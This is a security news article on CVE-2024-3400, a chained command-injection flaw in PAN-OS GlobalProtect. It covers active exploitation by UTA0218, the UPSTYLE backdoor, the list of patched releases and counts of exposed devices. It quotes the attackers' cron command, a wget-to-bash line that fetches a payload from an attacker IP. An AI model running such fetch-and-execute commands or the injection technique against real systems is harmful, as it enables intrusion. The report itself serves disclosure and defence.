Palo Alto Networks has shared more details about a critical security flaw impacting PAN-OS and being actively exploited by attackers.
The company described the vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), as “complex” and a combination of two bugs in PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 versions of the software.
“In the first, the GlobalProtect service did not sufficiently validate the format of the session IDs before storing them. This allowed the attacker to store an empty file with the attacker’s chosen file name,” Chandan BN, senior director of security at produced at Palo Alto Networks, he said.
“The second bug (trusting the files to be system-generated) used file names as part of a command.”
It’s worth noting that while neither issue is critical enough on its own, when chained together they could lead to the execution of unauthenticated remote shell commands.
Palo Alto Networks said the threat actor behind the zero-day exploitation of the flaw, UTA0218, carried out a two-stage attack to gain command execution on sensitive devices. The activity is being tracked under the name Operation MidnightEclipse.
As previously disclosed by both Volexity and the network security company’s Unit 42 threat intelligence division, this involves sending specially crafted requests containing the command to be executed, which is then executed via a backdoor called UPSTYLE.
“The initial setup of UTA0218’s persistence mechanism involved configuring a cron job that would use wget to fetch a payload from an attacker-controlled URL with its output written to stdout and redirected to bash for execution” , Volexity noted last week.
“The attacker used this method to distribute and execute specific commands and download reverse proxy tools such as GOST (GO Simple Tunnel).”
Unit 42 said it was unable to determine commands executed via this mechanism – wget -qO- hxxp://172.233.228[.]93/politics | bash, but assessed that the cron job-based rig is likely used to perform post-exploitation tasks.
“In phase 1, the attacker sends GlobalProtect a carefully crafted shell command instead of a valid session ID,” Chandan explained. “This results in the creation of an empty file on the system with an embedded command as the filename, as chosen by the attacker.”
“In phase 2, an unaware scheduled system process that runs regularly uses the attacker-supplied filename in a command. This results in the attacker-supplied command being executed with elevated privileges.”
While Palo Alto Networks initially noted that successful exploitation of CVE-2024-3400 required firewall configurations for the GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled, the company has since confirmed that telemetry of the device has no influence on the problem.
This builds on new findings from Bishop Fox, who discovered bypasses to weaponize the flaw so that it doesn’t require enabling telemetry on a device to infiltrate it.
In recent days, the company has also expanded patches for the flaw to cover other commonly used maintenance releases:
- PAN-OS 10.2.9-h1
- PAN-OS 10.2.8-h3
- PAN-OS 10.2.7-h8
- PAN-OS 10.2.6-h3
- PAN-OS 10.2.5-h6
- PAN-OS 10.2.4-h16
- PAN-OS 10.2.3-h13
- PAN-OS 10.2.2-h5
- PAN-OS 10.2.1-h2
- PAN-OS 10.2.0-h3
- PAN-OS 11.0.4-h1
- PAN-OS 11.0.4-h2
- PAN-OS 11.0.3-h10
- PAN-OS 11.0.2-h4
- PAN-OS 11.0.1-h4
- PAN-OS 11.0.0-h3
- PAN-OS 11.1.2-h3
- PAN-OS 11.1.1-h1
- PAN-OS 11.1.0-h3
In light of the active abuse of CVE-2024-3400 and the availability of proof-of-concept (PoC) exploit code, users are advised to take steps to apply hotfixes as soon as possible to protect themselves from potential threats.
The US Cybersecurity and Infrastructure Security Agency (CISA) also added the flaw to its catalog of known exploited vulnerabilities (KEVs), ordering federal agencies to secure their devices by April 19, 2024.
Second information shared by the Shadowserver Foundation, approximately 22,542 firewall devices exposed to the Internet are likely vulnerable to CVE-2024-3400. As of April 18, 2024, the majority of devices are located in the United States, Japan, India, Germany, United Kingdom, Canada, Australia, France, and China.